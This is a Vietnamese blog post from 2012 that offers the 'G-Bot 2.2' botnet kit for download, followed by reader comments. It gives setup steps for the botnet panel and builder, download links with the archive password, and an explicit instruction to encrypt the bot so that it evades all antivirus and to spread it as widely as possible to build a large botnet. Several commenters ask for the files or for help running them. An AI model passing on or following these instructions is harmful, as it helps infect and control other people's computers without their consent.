Chủ Nhật, 10 tháng 6, 2012

[Bonet] G-bot 2.2

Code + Data + File Buider  G-Bot version 2.2.  Code này được viết bới các hacker người nga.




Cách sử dụng:

-  Upcode + Database lên host sau đó chỉnh sửa các thông số trong file config ( bao gồm cả pass để dăng nhập nữa)



-  Click vào file buider.exe để tạo bot.

Host: tên domain

Path : Đường dẫn tới code botnet:



- Bước còn lại là bạn file mã hóa con bot này khỏi tât cả antivirus và phát tán nó càng nhiều càng tốt để tạo 1 mạng lưới bot lớn.


Link download: 

G-Bot 2.2 : http://www.mediafire.com/download.php?o9mg3berija7jpj
G-bot 1.7 :  http://www.mediafire.com/download.php?3qbxeyuvqhoxidi


Pass dải nén: vhb

9 nhận xét:

KKK nói...

Ko có link download phần mềm này ak.

DUNG nói...

Mình đã update rồi nhé. cả version :D

Unknown nói...

bạn có thể cho mình xin sđt dc ko...mong sớm dc bạn liên hệ..sđt của mjnh 0164.977.0405

DUNG nói...

Sory bạn! mình ngại public nhưng thông tin như sdt lắm. Bạn có thể ll với mình qua yh chat. thanks!

Kẻ Chọc Giận nói...

không biết họ thêm chức năng như vượt Firewall hay vượt user + pass như thế nào nhỉ.
còn bypass bot nữa !

Unknown nói...

sao thay check bin.exe mmà không có gì xuất hiện vậy Dũng

Unknown nói...

mình đang cần code để demo bot net mong Dũng có thể giúp mình với!

Unknown nói...

version 2.2 hình như không down dc bạn ơi.Mấy con bot này còn khả thi không mình cũng muốn học hỏi về cái này

Unknown nói...

version 2.2 hình như không down dc bạn ơi.Mấy con bot này còn khả thi không mình cũng muốn học hỏi về cái này

Đăng nhận xét